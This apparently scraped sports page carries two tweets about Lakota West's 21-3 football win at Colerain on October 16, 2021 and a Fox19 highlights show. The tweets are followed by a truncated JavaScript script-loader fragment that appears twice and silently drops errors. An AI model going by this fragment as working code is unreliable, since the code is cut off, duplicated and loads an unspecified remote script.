Football
West football makes it three straight against Colerain under Bolden!
Here's @CoachTomBolden after tonight's emotional 21-3 win at Colerain with highlights @tshabola_tegra @MoneyMitchBold @run_trent4 @LakotaWestAD @gmcsports @jyairebrown13 @LakotaWestFB @westfirebirds @WLWT #Blitz5 pic.twitter.com/xaw5PU4Dn7
— Mark Slaughter (@MarkVSlaughter) October 16, 2021
Severe weather couldn't kill the #Fox19FinalQuarter.
The entire show is here for you. See highlights from all 14 games.
Also, I need to pick better freeze frames. Seriously.https://t.co/y0ZB8fKtLs@westfirebirds @bethelTsports @RyleAthletics @VikeNation @CovCathColonels
— Jeremy Rauch (@FOX19Jeremy) October 16, 2021
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();